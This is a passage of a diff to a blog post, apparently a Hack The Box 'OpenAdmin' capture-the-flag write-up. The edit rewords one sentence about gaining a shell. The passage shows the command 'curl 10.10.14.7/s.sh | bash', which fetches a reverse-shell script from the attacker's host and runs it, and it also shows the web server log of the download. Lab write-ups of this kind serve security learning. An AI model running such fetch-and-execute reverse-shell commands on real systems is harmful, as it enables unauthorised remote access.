chr0x6eos/chr0x6eos.github.io/_posts/2020-05-02-htb-OpenAdmin.md

 /usr/bin/curl
 $ curl 10.10.14.7/s.sh | bash
 ```
-With curl being installed, we can simply access the shell and directly pipe it into bash to execute the reverse-shell.
+With curl being installed, we can simply access the reverse-shell and directly pipe it into bash to execute it.

 `10.10.10.171 - - [02/May/2020 14:36:59] "GET /s.sh HTTP/1.1" 200 -`